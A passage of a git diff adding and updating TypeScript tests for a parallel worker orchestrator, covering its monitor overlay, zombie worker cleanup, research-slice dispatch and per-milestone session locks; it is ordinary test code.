+    const m001 = result.eligible.find(e => e.milestoneId === "M001");
+    assert.ok(m001, "M001 with proper planning should be eligible");
+
+    // M012 should appear somewhere but must NOT be eligible.  It has no
+    // slices in the DB, context exists so it's not a ghost, but state
+    // derivation should classify it as active with no work items.  Even if
+    // it appears in registry as "active", it is eligible only if deps are
+    // satisfied — which they are (no deps).  The critical check: it must
+    // NOT cause a re-dispatch of work that is already done in the worktree.
+    //
+    // NOTE: This test documents the current behavior.  If the DB status is
+    // "active" and the milestone is in the registry, it WILL appear eligible
+    // (this is a separate fix path — Bug 1 is about writing DB status).
+    // We verify the fix path through Bug 2's ghost handling above.
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-monitor-overlay.test.ts b/src/resources/extensions/gsd/tests/parallel-monitor-overlay.test.ts
new file mode 100644
index 000000000..cc1d19ac6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/parallel-monitor-overlay.test.ts
@@ -0,0 +1,81 @@
+import { describe, it } from "node:test";
+import assert from "node:assert";
+
+/**
+ * Basic tests for the parallel monitor overlay data helpers.
+ * The overlay is primarily a rendering component that reads existing
+ * status files — these tests verify the helper logic in isolation.
+ */
+
+describe("parallel-monitor-overlay", () => {
+  it("progressBar generates correct width", async () => {
+    // Dynamic import to test the module loads cleanly
+    const mod = await import("../parallel-monitor-overlay.js");
+    // Module should export the class
+    assert.ok(mod.ParallelMonitorOverlay, "ParallelMonitorOverlay class should be exported");
+  });
+
+  it("ParallelMonitorOverlay can be instantiated with mock tui", async () => {
+    const mod = await import("../parallel-monitor-overlay.js");
+
+    let renderRequested = false;
+    const mockTui = { requestRender: () => { renderRequested = true; } };
+    const mockTheme = {
+      fg: (_color: string, text: string) => text,
+      bold: (text: string) => text,
+    };
+    let closed = false;
+
+    const overlay = new mod.ParallelMonitorOverlay(
+      mockTui,
+      mockTheme as any,
+      () => { closed = true; },
+      "/nonexistent/path",  // basePath — no real data, tests empty state
+    );
+
+    // Should render without throwing
+    const lines = overlay.render(80);
+    assert.ok(Array.isArray(lines), "render should return an array");
+    assert.ok(lines.length > 0, "render should return at least one line");
+
+    // Should contain header text
+    const joined = lines.join("\n");
+    assert.ok(joined.includes("Parallel Monitor"), "should include title");
+    assert.ok(joined.includes("No parallel workers found"), "should show empty state");
+
+    // Dispose should not throw
+    overlay.dispose();
+
+    // handleInput with ESC should call onClose
+    const overlay2 = new mod.ParallelMonitorOverlay(
+      mockTui,
+      mockTheme as any,
+      () => { closed = true; },
+      "/nonexistent/path",
+    );
+    overlay2.handleInput("q");
+    assert.ok(closed, "pressing q should trigger onClose");
+    overlay2.dispose();
+  });
+
+  it("ParallelMonitorOverlay clamps scrollOffset during render", async () => {
+    const mod = await import("../parallel-monitor-overlay.js");
+
+    const mockTui = { requestRender: () => {} };
+    const mockTheme = {
+      fg: (_color: string, text: string) => text,
+      bold: (text: string) => text,
+    };
+    const overlay = new mod.ParallelMonitorOverlay(
+      mockTui,
+      mockTheme as any,
+      () => {},
+      "/nonexistent/path",
+    );
+
+    (overlay as any).scrollOffset = 999;
+    overlay.render(80);
+    assert.equal((overlay as any).scrollOffset, 0, "empty overlays clamp scroll to zero");
+    overlay.dispose();
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-orchestration.test.ts b/src/resources/extensions/gsd/tests/parallel-orchestration.test.ts
index aabd9736c..ab541faaa 100644
--- a/src/resources/extensions/gsd/tests/parallel-orchestration.test.ts
+++ b/src/resources/extensions/gsd/tests/parallel-orchestration.test.ts
@@ -297,7 +297,6 @@ describe("parallel-orchestrator: lifecycle", () => {
             worktreePath: "/tmp/wt-M001",
             startedAt: Date.now(),
             state: "running",
-            completedUnits: 2,
             cost: 0.25,
           },
         ],
@@ -309,7 +308,6 @@ describe("parallel-orchestrator: lifecycle", () => {
       const workers = getWorkerStatuses(base);
       assert.equal(workers.length, 1);
       assert.equal(workers[0].milestoneId, "M001");
-      assert.equal(workers[0].completedUnits, 2);
       assert.equal(isParallelActive(), true);
     } finally {
       resetOrchestrator();
@@ -416,7 +414,6 @@ describe("parallel-orchestrator: lifecycle", () => {
       const workers = getWorkerStatuses();
       assert.equal(workers.length, 1);
       assert.equal(workers[0].state, "running");
-      assert.equal(workers[0].completedUnits, 4);
     } finally {
       resetOrchestrator();
       rmSync(base, { recursive: true, force: true });
@@ -552,7 +549,6 @@ function makeWorker(overrides: Partial<WorkerInfo> = {}): WorkerInfo {
     worktreePath: "/tmp/test-worktree",
     startedAt: Date.now() - 60_000,
     state: "stopped",
-    completedUnits: 5,
     cost: 2.50,
     ...overrides,
   };
@@ -563,9 +559,9 @@ function makeWorker(overrides: Partial<WorkerInfo> = {}): WorkerInfo {
 describe("parallel-merge: determineMergeOrder sequential", () => {
   it("returns milestone IDs sorted alphabetically by default", () => {
     const workers = [
-      makeWorker({ milestoneId: "M003", state: "stopped", completedUnits: 1 }),
-      makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 2 }),
-      makeWorker({ milestoneId: "M002", state: "stopped", completedUnits: 3 }),
+      makeWorker({ milestoneId: "M003", state: "stopped" }),
+      makeWorker({ milestoneId: "M001", state: "stopped" }),
+      makeWorker({ milestoneId: "M002", state: "stopped" }),
     ];
     const order = determineMergeOrder(workers, "sequential");
     assert.deepEqual(order, ["M001", "M002", "M003"]);
@@ -573,27 +569,27 @@ describe("parallel-merge: determineMergeOrder sequential", () => {
 
   it("excludes workers that are still running", () => {
     const workers = [
-      makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 5 }),
-      makeWorker({ milestoneId: "M002", state: "running", completedUnits: 0 }),
-      makeWorker({ milestoneId: "M003", state: "stopped", completedUnits: 2 }),
+      makeWorker({ milestoneId: "M001", state: "stopped" }),
+      makeWorker({ milestoneId: "M002", state: "running" }),
+      makeWorker({ milestoneId: "M003", state: "stopped" }),
     ];
     const order = determineMergeOrder(workers, "sequential");
     assert.deepEqual(order, ["M001", "M003"]);
   });
 
-  it("excludes workers with zero completedUnits even if stopped", () => {
+  it("includes all stopped workers", () => {
     const workers = [
-      makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 0 }),
-      makeWorker({ milestoneId: "M002", state: "stopped", completedUnits: 3 }),
+      makeWorker({ milestoneId: "M001", state: "stopped" }),
+      makeWorker({ milestoneId: "M002", state: "stopped" }),
     ];
     const order = determineMergeOrder(workers, "sequential");
-    assert.deepEqual(order, ["M002"]);
+    assert.deepEqual(order, ["M001", "M002"]);
   });
 
   it("returns empty array when no workers are completed", () => {
     const workers = [
-      makeWorker({ milestoneId: "M001", state: "running", completedUnits: 0 }),
-      makeWorker({ milestoneId: "M002", state: "paused", completedUnits: 0 }),
+      makeWorker({ milestoneId: "M001", state: "running" }),
+      makeWorker({ milestoneId: "M002", state: "paused" }),
     ];
     const order = determineMergeOrder(workers);
     assert.deepEqual(order, []);
@@ -601,8 +597,8 @@ describe("parallel-merge: determineMergeOrder sequential", () => {
 
   it("uses sequential order as the default when no order arg provided", () => {
     const workers = [
-      makeWorker({ milestoneId: "M002", state: "stopped", completedUnits: 1 }),
-      makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 1 }),
+      makeWorker({ milestoneId: "M002", state: "stopped" }),
+      makeWorker({ milestoneId: "M001", state: "stopped" }),
     ];
     // Call with no second argument — should default to "sequential"
     const order = determineMergeOrder(workers);
@@ -614,9 +610,9 @@ describe("parallel-merge: determineMergeOrder by-completion", () => {
   it("returns milestones sorted by startedAt (earliest first)", () => {
     const now = Date.now();
     const workers = [
-      makeWorker({ milestoneId: "M003", state: "stopped", completedUnits: 1, startedAt: now - 30_000 }),
-      makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 1, startedAt: now - 90_000 }),
-      makeWorker({ milestoneId: "M002", state: "stopped", completedUnits: 1, startedAt: now - 60_000 }),
+      makeWorker({ milestoneId: "M003", state: "stopped", startedAt: now - 30_000 }),
+      makeWorker({ milestoneId: "M001", state: "stopped", startedAt: now - 90_000 }),
+      makeWorker({ milestoneId: "M002", state: "stopped", startedAt: now - 60_000 }),
     ];
     const order = determineMergeOrder(workers, "by-completion");
     assert.deepEqual(order, ["M001", "M002", "M003"]);
@@ -625,9 +621,9 @@ describe("parallel-merge: determineMergeOrder by-completion", () => {
   it("excludes paused workers from by-completion order", () => {
     const now = Date.now();
     const workers = [
-      makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 2, startedAt: now - 90_000 }),
-      makeWorker({ milestoneId: "M002", state: "paused",  completedUnits: 1, startedAt: now - 60_000 }),
-      makeWorker({ milestoneId: "M003", state: "stopped", completedUnits: 3, startedAt: now - 30_000 }),
+      makeWorker({ milestoneId: "M001", state: "stopped", startedAt: now - 90_000 }),
+      makeWorker({ milestoneId: "M002", state: "paused",  startedAt: now - 60_000 }),
+      makeWorker({ milestoneId: "M003", state: "stopped", startedAt: now - 30_000 }),
     ];
     const order = determineMergeOrder(workers, "by-completion");
     assert.deepEqual(order, ["M001", "M003"]);
diff --git a/src/resources/extensions/gsd/tests/parallel-orchestrator-zombie-cleanup.test.ts b/src/resources/extensions/gsd/tests/parallel-orchestrator-zombie-cleanup.test.ts
new file mode 100644
index 000000000..7de8a553d
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/parallel-orchestrator-zombie-cleanup.test.ts
@@ -0,0 +1,277 @@
+/**
+ * Regression tests for zombie worker cleanup (#2736).
+ *
+ * Verifies that:
+ * 1. refreshWorkerStatuses() deactivates the orchestrator when all workers
+ *    are in terminal states (error/stopped).
+ * 2. restoreRuntimeState() (via getWorkerStatuses) returns empty when the
+ *    cached state has only dead workers.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, writeFileSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { randomUUID } from "node:crypto";
+
+import {
+  persistState,
+  resetOrchestrator,
+  refreshWorkerStatuses,
+  isParallelActive,
+  getOrchestratorState,
+  getWorkerStatuses,
+  type PersistedState,
+} from "../parallel-orchestrator.ts";
+
+function makeTmpBase(): string {
+  const base = join(tmpdir(), `gsd-test-zombie-${randomUUID()}`);
+  mkdirSync(join(base, ".gsd", "parallel"), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try {
+    rmSync(base, { recursive: true, force: true });
+  } catch { /* non-fatal */ }
+}
+
+/** Write a fake orchestrator.json to simulate persisted state. */
+function writePersistedState(basePath: string, data: PersistedState): void {
+  const dest = join(basePath, ".gsd", "orchestrator.json");
+  writeFileSync(dest, JSON.stringify(data, null, 2), "utf-8");
+}
+
+/** Write a fake session status file to .gsd/parallel/<milestoneId>.status.json */
+function writeSessionStatusFile(
+  basePath: string,
+  milestoneId: string,
+  state: "running" | "paused" | "stopped" | "error",
+  pid: number,
+): void {
+  const dest = join(basePath, ".gsd", "parallel", `${milestoneId}.status.json`);
+  writeFileSync(
+    dest,
+    JSON.stringify({
+      milestoneId,
+      pid,
+      state,
+      currentUnit: null,
+      completedUnits: 0,
+      cost: 0.5,
+      lastHeartbeat: Date.now(),
+      startedAt: Date.now() - 60_000,
+      worktreePath: join(basePath, "worktrees", milestoneId),
+    }),
+    "utf-8",
+  );
+}
+
+// Use a PID that is guaranteed dead — PID 1 is init/launchd and won't be
+// killable by this process, but 2147483647 is unlikely to exist.
+const DEAD_PID = 2147483647;
+
+// ─── refreshWorkerStatuses: deactivates when all workers dead ──────────
+
+test("#2736: refreshWorkerStatuses deactivates orchestrator when all workers are error/stopped", (t) => {
+  const base = makeTmpBase();
+  t.after(() => {
+    resetOrchestrator();
+    cleanup(base);
+  });
+
+  // Seed persisted state with two workers using current PID (alive) so
+  // restoreState() accepts them, then immediately mark them as error via
+  // session status files so refreshWorkerStatuses sees terminal states.
+  const persisted: PersistedState = {
+    active: true,
+    workers: [
+      {
+        milestoneId: "M001",
+        title: "Milestone 1",
+        pid: process.pid, // alive PID so restoreState accepts it
+        worktreePath: join(base, "worktrees", "M001"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 1.0,
+      },
+      {
+        milestoneId: "M002",
+        title: "Milestone 2",
+        pid: process.pid,
+        worktreePath: join(base, "worktrees", "M002"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 0.5,
+      },
+    ],
+    totalCost: 1.5,
+    startedAt: Date.now() - 60_000,
+    configSnapshot: { max_workers: 3 },
+  };
+  writePersistedState(base, persisted);
+
+  // First, restore the state into memory via getWorkerStatuses (triggers restoreIfNeeded)
+  const workers = getWorkerStatuses(base);
+  assert.equal(workers.length, 2, "should have 2 workers after restore");
+  assert.ok(isParallelActive(), "orchestrator should be active after restore");
+
+  // Now write session status files marking both workers as error
+  writeSessionStatusFile(base, "M001", "error", process.pid);
+  writeSessionStatusFile(base, "M002", "error", process.pid);
+
+  // Refresh — should detect all-dead and deactivate
+  refreshWorkerStatuses(base);
+
+  assert.equal(isParallelActive(), false, "orchestrator should be inactive after all workers died");
+  assert.equal(getOrchestratorState(), null, "state should be null after cleanup");
+});
+
+test("#2736: refreshWorkerStatuses keeps orchestrator active when some workers are still running", (t) => {
+  const base = makeTmpBase();
+  t.after(() => {
+    resetOrchestrator();
+    cleanup(base);
+  });
+
+  const persisted: PersistedState = {
+    active: true,
+    workers: [
+      {
+        milestoneId: "M001",
+        title: "Milestone 1",
+        pid: process.pid,
+        worktreePath: join(base, "worktrees", "M001"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 1.0,
+      },
+      {
+        milestoneId: "M002",
+        title: "Milestone 2",
+        pid: process.pid,
+        worktreePath: join(base, "worktrees", "M002"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 0.5,
+      },
+    ],
+    totalCost: 1.5,
+    startedAt: Date.now() - 60_000,
+    configSnapshot: { max_workers: 3 },
+  };
+  writePersistedState(base, persisted);
+
+  // Restore state
+  getWorkerStatuses(base);
+
+  // Mark M001 as error but keep M002 running
+  writeSessionStatusFile(base, "M001", "error", process.pid);
+  writeSessionStatusFile(base, "M002", "running", process.pid);
+
+  refreshWorkerStatuses(base);
+
+  assert.ok(isParallelActive(), "orchestrator should remain active with a running worker");
+  assert.ok(getOrchestratorState() !== null, "state should still exist");
+});
+
+// ─── restoreRuntimeState: returns false when cached state has only dead workers ─
+
+test("#2736: getWorkerStatuses returns empty when all cached workers are in error state", (t) => {
+  const base = makeTmpBase();
+  t.after(() => {
+    resetOrchestrator();
+    cleanup(base);
+  });
+
+  // First, set up active state with live workers
+  const persisted: PersistedState = {
+    active: true,
+    workers: [
+      {
+        milestoneId: "M001",
+        title: "Milestone 1",
+        pid: process.pid,
+        worktreePath: join(base, "worktrees", "M001"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 0.5,
+      },
+    ],
+    totalCost: 0.5,
+    startedAt: Date.now() - 60_000,
+    configSnapshot: { max_workers: 3 },
+  };
+  writePersistedState(base, persisted);
+
+  // Restore into memory
+  getWorkerStatuses(base);
+  assert.ok(isParallelActive(), "should be active initially");
+
+  // Simulate all workers dying: write error status then refresh to update
+  writeSessionStatusFile(base, "M001", "error", process.pid);
+  refreshWorkerStatuses(base);
+
+  // State should now be cleared
+  assert.equal(getOrchestratorState(), null, "state should be null after all workers error");
+
+  // Reset and try again — getWorkerStatuses with restoreIfNeeded should
+  // find no live workers on disk (orchestrator.json was cleaned up)
+  const workers = getWorkerStatuses(base);
+  assert.equal(workers.length, 0, "should return empty when no live workers exist");
+});
+
+test("#2736: restoreRuntimeState clears stale state when all workers are stopped", (t) => {
+  const base = makeTmpBase();
+  t.after(() => {
+    resetOrchestrator();
+    cleanup(base);
+  });
+
+  // Set up and restore state
+  const persisted: PersistedState = {
+    active: true,
+    workers: [
+      {
+        milestoneId: "M001",
+        title: "Milestone 1",
+        pid: process.pid,
+        worktreePath: join(base, "worktrees", "M001"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 0.3,
+      },
+      {
+        milestoneId: "M002",
+        title: "Milestone 2",
+        pid: process.pid,
+        worktreePath: join(base, "worktrees", "M002"),
+        startedAt: Date.now() - 60_000,
+        state: "running",
+        cost: 0.7,
+      },
+    ],
+    totalCost: 1.0,
+    startedAt: Date.now() - 60_000,
+    configSnapshot: { max_workers: 3 },
+  };
+  writePersistedState(base, persisted);
+
+  // Restore into memory
+  getWorkerStatuses(base);
+  assert.ok(isParallelActive(), "should be active initially");
+
+  // Mark all as stopped via session status, then refresh
+  writeSessionStatusFile(base, "M001", "stopped", process.pid);
+  writeSessionStatusFile(base, "M002", "stopped", process.pid);
+  refreshWorkerStatuses(base);
+
+  // Orchestrator should be deactivated and state cleaned
+  assert.equal(isParallelActive(), false, "should be inactive after all workers stopped");
+  assert.equal(getOrchestratorState(), null, "state should be null");
+
+  // Verify the state file was removed
+  const stateFile = join(base, ".gsd", "orchestrator.json");
+  assert.equal(existsSync(stateFile), false, "orchestrator.json should be removed");
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-research-dispatch.test.ts b/src/resources/extensions/gsd/tests/parallel-research-dispatch.test.ts
new file mode 100644
index 000000000..37d7bb00e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/parallel-research-dispatch.test.ts
@@ -0,0 +1,146 @@
+/**
+ * Parallel research slices dispatch — structural tests.
+ *
+ * Verifies the dispatch rule and prompt builder exist with correct structure.
+ */
+
+import test, { afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { tmpdir } from "node:os";
+import { fileURLToPath } from "node:url";
+
+import { resolveDispatch } from "../auto-dispatch.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+const dispatchSrc = readFileSync(join(__dirname, "..", "auto-dispatch.ts"), "utf-8");
+const promptsSrc = readFileSync(join(__dirname, "..", "auto-prompts.ts"), "utf-8");
+const templatePath = join(__dirname, "..", "prompts", "parallel-research-slices.md");
+const templateSrc = readFileSync(templatePath, "utf-8");
+
+const tmpDirs: string[] = [];
+
+function makeTmpProject(): string {
+  const base = mkdtempSync(join(tmpdir(), "parallel-research-"));
+  tmpDirs.push(base);
+  const milestoneDir = join(base, ".gsd", "milestones", "M001");
+  mkdirSync(milestoneDir, { recursive: true });
+  writeFileSync(
+    join(milestoneDir, "M001-ROADMAP.md"),
+    [
+      "# M001: Parallel Research Milestone",
+      "",
+      "**Vision:** Research-ready slices.",
+      "",
+      "**Success Criteria:**",
+      "- Research both slices",
+      "",
+      "## Slices",
+      "",
+      "- [ ] **S01: Alpha** `risk:low` `depends:[]`",
+      "- [ ] **S02: Beta** `risk:low` `depends:[]`",
+      "",
+      "## Boundary Map",
+      "",
+    ].join("\n"),
+    "utf-8",
+  );
+  return base;
+}
+
+afterEach(() => {
+  for (const dir of tmpDirs) {
+    try {
+      rmSync(dir, { recursive: true, force: true });
+    } catch {
+      // Best-effort cleanup only.
+    }
+  }
+  tmpDirs.length = 0;
+});
+
+// ─── Dispatch rule ────────────────────────────────────────────────────────
+
+test("dispatch: parallel-research-slices rule exists", () => {
+  assert.ok(
+    dispatchSrc.includes("parallel-research-slices"),
+    "dispatch table should have parallel-research-slices rule",
+  );
+});
+
+test("dispatch: parallel-research-slices requires 2+ slices", () => {
+  assert.ok(
+    dispatchSrc.includes("researchReadySlices.length < 2"),
+    "rule should require at least 2 slices for parallel dispatch",
+  );
+});
+
+test("dispatch: parallel-research-slices respects skip_research", () => {
+  const ruleIdx = dispatchSrc.indexOf("parallel-research-slices");
+  const ruleBlock = dispatchSrc.slice(ruleIdx, ruleIdx + 500);
+  assert.ok(
+    ruleBlock.includes("skip_research") || dispatchSrc.slice(ruleIdx - 300, ruleIdx).includes("skip_research"),
+    "rule should check skip_research preference",
+  );
+});
+
+// ─── Prompt builder ───────────────────────────────────────────────────────
+
+test("prompt: buildParallelResearchSlicesPrompt exported", () => {
+  assert.ok(
+    promptsSrc.includes("export async function buildParallelResearchSlicesPrompt"),
+    "buildParallelResearchSlicesPrompt should be exported",
+  );
+});
+
+test("prompt: builds per-slice subagent prompts", () => {
+  assert.ok(
+    promptsSrc.includes("buildResearchSlicePrompt"),
+    "parallel prompt builder should delegate to per-slice research prompts",
+  );
+});
+
+// ─── Template ─────────────────────────────────────────────────────────────
+
+test("template: parallel-research-slices.md has required variables", () => {
+  assert.ok(templateSrc.includes("{{sliceCount}}"), "template should use sliceCount");
+  assert.ok(templateSrc.includes("{{mid}}"), "template should use mid");
+  assert.ok(templateSrc.includes("{{subagentPrompts}}"), "template should use subagentPrompts");
+});
+
+// ─── Validate milestone prompt ────────────────────────────────────────────
+
+test("template: validate-milestone uses parallel reviewers", () => {
+  const validateSrc = readFileSync(join(__dirname, "..", "prompts", "validate-milestone.md"), "utf-8");
+  assert.ok(
+    validateSrc.includes("Reviewer A") && validateSrc.includes("Reviewer B") && validateSrc.includes("Reviewer C"),
+    "validate-milestone should dispatch 3 parallel reviewers",
+  );
+});
+
+test("resolveDispatch prefers parallel research when multiple slices are ready", async () => {
+  const base = makeTmpProject();
+
+  const action = await resolveDispatch({
+    basePath: base,
+    mid: "M001",
+    midTitle: "Parallel Research Milestone",
+    state: {
+      phase: "planning",
+      activeMilestone: { id: "M001", title: "Parallel Research Milestone", status: "active" },
+      activeSlice: { id: "S01", title: "Alpha" },
+      activeTask: null,
+      registry: [],
+      blockers: [],
+    } as any,
+    prefs: undefined,
+  });
+
+  assert.equal(action.action, "dispatch");
+  if (action.action === "dispatch") {
+    assert.equal(action.unitType, "research-slice");
+    assert.equal(action.unitId, "M001/parallel-research");
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-worker-lock-contention.test.ts b/src/resources/extensions/gsd/tests/parallel-worker-lock-contention.test.ts
new file mode 100644
index 000000000..0f27fa0ac
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/parallel-worker-lock-contention.test.ts
@@ -0,0 +1,226 @@
+/**
+ * parallel-worker-lock-contention.test.ts — Regression tests for #2184.
+ *
+ * Covers all four bugs from the parallel worker contention issue:
+ *   Bug 1: Session lock contention — per-milestone lock isolation
+ *   Bug 2: Budget ceiling scoped to current session for parallel workers
+ *   Bug 3: syncProjectRootToWorktree skips when source === destination (symlinks)
+ *   Bug 4: createMilestoneWorktree copies planning artifacts
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import {
+  mkdtempSync,
+  mkdirSync,
+  writeFileSync,
+  rmSync,
+  existsSync,
+  symlinkSync,
+  readFileSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  acquireSessionLock,
+  releaseSessionLock,
+  effectiveLockFile,
+  effectiveLockTarget,
+} from "../session-lock.ts";
+import { gsdRoot } from "../paths.ts";
+import {
+  syncProjectRootToWorktree,
+  syncStateToProjectRoot,
+} from "../auto-worktree.ts";
+import { writeLock, readCrashLock, clearLock } from "../crash-recovery.ts";
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+
+// ─── Bug 1: Per-milestone lock isolation ──────────────────────────────────────
+
+describe("parallel-worker-lock-contention (#2184)", () => {
+  // Save and restore env vars between tests
+  const savedEnv: Record<string, string | undefined> = {};
+
+  beforeEach(() => {
+    savedEnv.GSD_PARALLEL_WORKER = process.env.GSD_PARALLEL_WORKER;
+    savedEnv.GSD_MILESTONE_LOCK = process.env.GSD_MILESTONE_LOCK;
+  });
+
+  afterEach(() => {
+    if (savedEnv.GSD_PARALLEL_WORKER === undefined) {
+      delete process.env.GSD_PARALLEL_WORKER;
+    } else {
+      process.env.GSD_PARALLEL_WORKER = savedEnv.GSD_PARALLEL_WORKER;
+    }
+    if (savedEnv.GSD_MILESTONE_LOCK === undefined) {
+      delete process.env.GSD_MILESTONE_LOCK;
+    } else {
+      process.env.GSD_MILESTONE_LOCK = savedEnv.GSD_MILESTONE_LOCK;
+    }
+  });
+
+  // ─── Bug 1a: effectiveLockFile returns per-milestone name ────────────────
+  test("Bug 1a: effectiveLockFile returns auto.lock without parallel env", () => {
+    delete process.env.GSD_PARALLEL_WORKER;
+    delete process.env.GSD_MILESTONE_LOCK;
+    assert.equal(effectiveLockFile(), "auto.lock");
+  });
+
+  test("Bug 1a: effectiveLockFile returns auto-<MID>.lock in parallel mode", () => {
+    process.env.GSD_PARALLEL_WORKER = "1";
+    process.env.GSD_MILESTONE_LOCK = "M003";
+    assert.equal(effectiveLockFile(), "auto-M003.lock");
+  });
+
+  // ─── Bug 1b: effectiveLockTarget returns per-milestone directory ─────────
+  test("Bug 1b: effectiveLockTarget returns gsdDir without parallel env", () => {
+    delete process.env.GSD_PARALLEL_WORKER;
+    const gsdDir = "/tmp/test/.gsd";
+    assert.equal(effectiveLockTarget(gsdDir), gsdDir);
+  });
+
+  test("Bug 1b: effectiveLockTarget returns parallel/<MID> in parallel mode", () => {
+    process.env.GSD_PARALLEL_WORKER = "1";
+    process.env.GSD_MILESTONE_LOCK = "M003";
+    const gsdDir = "/tmp/test/.gsd";
+    assert.equal(effectiveLockTarget(gsdDir), join(gsdDir, "parallel", "M003"));
+  });
+
+  // ─── Bug 1c: Two parallel workers acquire independent locks ──────────────
+  test("Bug 1c: parallel workers use per-milestone lock files, not shared auto.lock", () => {
+    const base = mkdtempSync(join(tmpdir(), "gsd-parallel-lock-"));
+    mkdirSync(join(base, ".gsd"), { recursive: true });
+
+    try {
+      // Simulate worker for M001
+      process.env.GSD_PARALLEL_WORKER = "1";
+      process.env.GSD_MILESTONE_LOCK = "M001";
+
+      const r1 = acquireSessionLock(base);
+      assert.ok(r1.acquired, "M001 worker acquires lock");
+
+      // Verify the lock file is per-milestone
+      const gsdDir = gsdRoot(base);
+      const m001LockFile = join(gsdDir, "auto-M001.lock");
+      assert.ok(existsSync(m001LockFile), "auto-M001.lock exists");
+
+      // The shared auto.lock should NOT exist
+      const sharedLockFile = join(gsdDir, "auto.lock");
+      assert.ok(!existsSync(sharedLockFile), "shared auto.lock does NOT exist");
+
+      // The per-milestone lock target directory should exist
+      const m001LockTarget = join(gsdDir, "parallel", "M001");
+      assert.ok(existsSync(m001LockTarget), "parallel/M001 directory exists");
+
+      releaseSessionLock(base);
+
+      // After release, per-milestone lock file should be cleaned
+      assert.ok(!existsSync(m001LockFile), "auto-M001.lock cleaned after release");
+    } finally {
+      delete process.env.GSD_PARALLEL_WORKER;
+      delete process.env.GSD_MILESTONE_LOCK;
+      rmSync(base, { recursive: true, force: true });
+    }
+  });
+
+  // ─── Bug 1d: crash-recovery uses per-milestone lock file ─────────────────
+  test("Bug 1d: crash-recovery writeLock/readCrashLock uses per-milestone lock in parallel mode", () => {
+    const base = mkdtempSync(join(tmpdir(), "gsd-parallel-crash-"));
+    mkdirSync(join(base, ".gsd"), { recursive: true });
+
+    try {
+      process.env.GSD_PARALLEL_WORKER = "1";
+      process.env.GSD_MILESTONE_LOCK = "M002";
+
+      writeLock(base, "execute-task", "M002/S01/T01");
+
+      const gsdDir = gsdRoot(base);
+      const lockFile = join(gsdDir, "auto-M002.lock");
+      assert.ok(existsSync(lockFile), "crash-recovery writes auto-M002.lock");
+
+      const data = readCrashLock(base);
+      assert.ok(data !== null, "readCrashLock reads per-milestone lock");
+      assert.equal(data!.unitId, "M002/S01/T01");
+
+      clearLock(base);
+      assert.ok(!existsSync(lockFile), "clearLock removes per-milestone lock");
+    } finally {
+      delete process.env.GSD_PARALLEL_WORKER;
+      delete process.env.GSD_MILESTONE_LOCK;
+      rmSync(base, { recursive: true, force: true });
+    }
+  });
+
+  // ─── Bug 3: syncProjectRootToWorktree skips same-path symlinks ───────────
+  test("Bug 3: syncProjectRootToWorktree skips when .gsd resolves to same path (symlink)", () => {
+    const base = mkdtempSync(join(tmpdir(), "gsd-symlink-sync-"));
+    const externalGsd = join(base, "external-gsd");
+    const projectRoot = join(base, "project");
+    const worktreePath = join(base, "worktree");
+
+    mkdirSync(externalGsd, { recursive: true });
+    mkdirSync(projectRoot, { recursive: true });
+    mkdirSync(worktreePath, { recursive: true });
+
+    // Create the external state directory with a milestone
+    mkdirSync(join(externalGsd, "milestones", "M001"), { recursive: true });
+    writeFileSync(
+      join(externalGsd, "milestones", "M001", "M001-ROADMAP.md"),
+      "# Roadmap",
+    );
+
+    // Symlink both project and worktree .gsd to the same external directory
+    symlinkSync(externalGsd, join(projectRoot, ".gsd"));
+    symlinkSync(externalGsd, join(worktreePath, ".gsd"));
+
+    try {
+      // This should NOT throw ERR_FS_CP_EINVAL — it should skip silently
+      let threw = false;
+      try {
+        syncProjectRootToWorktree(projectRoot, worktreePath, "M001");
+      } catch {
+        threw = true;
+      }
+      assert.ok(!threw, "syncProjectRootToWorktree does not throw on same-path symlink");
+
+      // Same for reverse direction
+      threw = false;
+      try {
+        syncStateToProjectRoot(worktreePath, projectRoot, "M001");
+      } catch {
+        threw = true;
+      }
+      assert.ok(!threw, "syncStateToProjectRoot does not throw on same-path symlink");
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  });
+
+  // ─── Bug 3b: sync still works when paths are different ───────────────────
+  test("Bug 3b: syncProjectRootToWorktree copies when .gsd paths are different", () => {
+    const base = mkdtempSync(join(tmpdir(), "gsd-diff-sync-"));
+    const projectRoot = join(base, "project");
+    const worktreePath = join(base, "worktree");
+
+    mkdirSync(join(projectRoot, ".gsd", "milestones", "M001"), { recursive: true });
+    mkdirSync(join(worktreePath, ".gsd", "milestones"), { recursive: true });
+
+    writeFileSync(
+      join(projectRoot, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
+      "# Roadmap content",
+    );
+
+    try {
+      syncProjectRootToWorktree(projectRoot, worktreePath, "M001");
+
+      // The roadmap should have been copied
